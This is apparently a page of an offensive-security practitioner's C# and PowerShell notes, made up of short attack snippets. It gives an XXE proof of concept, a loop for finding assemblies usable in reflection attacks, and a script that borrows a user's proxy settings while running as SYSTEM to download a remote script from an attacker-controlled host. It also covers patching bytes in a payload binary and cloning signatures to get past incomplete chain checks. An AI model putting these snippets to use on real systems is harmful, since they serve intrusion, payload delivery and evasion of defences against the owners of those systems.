xct's notes
Search…
C#

Embeddd Dependencies

Install-Package Costura.Fody

XXE

XMLDocument PoC:
1
<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>
Copied!
This works on Net Framework <= 4.0 if the Resolver was not explicitly set to null.

Process Injection

Clone Signature

It will not verify through the chain but if the program does not check the whole chain it works ;-)

Look for Assemblies that can be used for Reflection Attacks

1
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
2
$Assemblies |
3
ForEach-Object {
4
$_.Location
5
$_.GetTypes()|
6
ForEach-Object {
7
$_ | Get-Member -Static| Where-Object {
8
$_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods')
9
}
10
} 2> $null
11
}
Copied!

Dynamically resolve Proxy via PowerShell

Sometimes we execute as SYSTEM and still need to use the boxes proxy settings to call back to us. In this case we can resolve the current proxy settings from HKCU and copy them.
1
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
2
$keys = Get-ChildItem 'HKU:\'
3
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
4
$proxy=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
5
[system.net.webrequest]::DefaultWebProxy = new-object
6
System.Net.WebProxy("http://$proxy")
7
$wc = new-object system.net.WebClient
8
$wc.Headers.Add('User-Agent', "Legit User Agent")
9
$wc.DownloadString("http://<ip>/script.ps1")
Copied!

Convert .NET Assembly to JScript

Edit Bytes in Binary

1
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")
2
$bytes[200] = 0xFF
3
[System.IO.File]::WriteAllBytes("payload.exe", $bytes)
Copied!
Last modified 9mo ago